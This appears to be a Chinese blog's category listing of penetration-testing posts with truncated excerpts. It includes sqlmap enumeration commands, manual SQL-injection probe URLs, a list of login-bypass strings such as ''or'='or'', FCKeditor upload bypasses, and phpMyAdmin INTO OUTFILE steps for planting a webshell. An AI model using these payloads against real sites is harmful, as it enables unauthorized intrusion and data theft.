![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
网络安全
lizhengnanhua
这个作者很懒,什么都没留下…
展开
-
Sqlmap常用渗透测试语句
1.获取网站基本信息 sqlmap.py -u http://.../ 2.获取网站的数据库信息sqlmap.py -u http://../ --dbs3.获取数据库DataBaseTest下的表Table(假设获取到表admin)sqlmap.py -u http://../ -D DataBaseTes --tables4.获取表admin的列明 sqlmap.原创 2014-09-05 00:31:04 · 2560 阅读 · 0 评论 -
手工注入猜解过程详解
1.猜解表名:http://xxx.com/test.asp?id=123 and (select count(*) from admin)>=0//猜解是否有表admin2.猜解字段名:http://xxx.com/test.asp?id=123 and (select count(adminname) from admin)>=0//admin表中是否有字段adminname3原创 2014-09-23 00:53:00 · 4884 阅读 · 0 评论 -
安全渗透 by80
1章 内容:端口 命令1,端口,这个很让人理解的字眼,电脑的端口一共有65535个,但实际用到的却只有几十个,常见的端口3389,4899,135,445,5900,1433,3306,1521,21,80,23,25,53等等,端口就像一座房子的烟囱一样,如果打开了,就可能会面临着一些风险,如3389,这是远程桌面的端口,他主要用于两个方面,一是实现网络交互的过程,一台原创 2014-09-11 04:43:30 · 3425 阅读 · 0 评论 -
Google hacking语法总结
inurl:在url中是否存在该关键字intext:搜索网页正文内容intitle:在网页标题中搜索关键字site:freeitjc.com 搜索站点及其host或urlfiletype:获取目标的文件类型。如:filetype:doc|bak|mdb|inc 将返回所有以doc,bak,mdb,inc结尾的文件URLlink:返回所有与目标url做了链接的ur原创 2014-09-07 01:52:01 · 7623 阅读 · 0 评论 -
wwwscan批处理配置
@echo offcolor 0aTITLE 地瓜师兄批处理wwwscan扫描器rem MODE CON COLS=80 LINES=36clsfor /f %%a in (url.txt) do wwwscan %%a -m 300 -t 30 -p 80原创 2014-09-10 01:01:31 · 1980 阅读 · 0 评论 -
后台登陆万能密码总结
1.Asp/Aspx万能密码:'or'='or''or 1=1--''or 1=1--'or'a'='a"or "a"="a"or"="a'='a ')or('a'='aor 1=1--a'or' 1=1--"or"="a'='a'or''='1 or '1'='1'=11 or '1'='1' or 1=1'OR 1=1%00"or 1=1%00'xoradmin' or 'a'='原创 2014-09-07 12:56:22 · 25371 阅读 · 0 评论 -
Fckeditor常见漏洞的挖掘与利用整理汇总
查看编辑器版本FCKeditor/_whatsnew.html—————————————————————————————————————————————————————————————2. Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破!测试通过。———————————————————————————————————————————原创 2014-08-09 02:47:56 · 41281 阅读 · 0 评论 -
谷歌搜索的高级技巧
intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:红盟.将返回所有在网页正文部分包含"红盟"的网页.allintext:使用方法和intext类似.intitle:和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:红客.将返回所有网页标题中包含"红客"原创 2014-08-09 02:44:22 · 1949 阅读 · 0 评论 -
经典XSS跨站脚本集合汇总整理
1)普通的XSS JavaScript注入(2)IMG标签XSS使用JavaScript命令(3)IMG标签无分号无引号(4)IMG标签大小写不敏感(5)HTML编码(必须有分号)(6)修正缺陷IMG标签alert(“XSS”)”>(7)formCharCode标签(计算器)(8)UTF原创 2014-08-09 02:42:12 · 3174 阅读 · 0 评论 -
入侵指定网站思路
入侵指定网站思路思路: 以下是入侵网站常用方法: 1.上传漏洞 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了! 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. 2.注入漏洞 字符过滤不严造成的转载 2014-08-09 02:37:33 · 3983 阅读 · 0 评论 -
在phpmyadmin后台获取webshell方法汇总整理
方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('');SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';----以上同时执行,在数据库: mysq原创 2014-08-09 02:42:55 · 24976 阅读 · 0 评论 -
服务器安全狗搭建过程
发现安全狗构建基础的服务器安全环境简单高效,推荐!整理步骤如下:环境:Centos 6.x/7.x 64位wget http://down.safedog.cn/safedog_linux64.tar.gztar xzvf safedog_linux64.tar.gzls cd safedog_an_linux64_2.8.21076chmod +x *.pyyum install -y dmid...原创 2018-06-09 17:05:19 · 2317 阅读 · 0 评论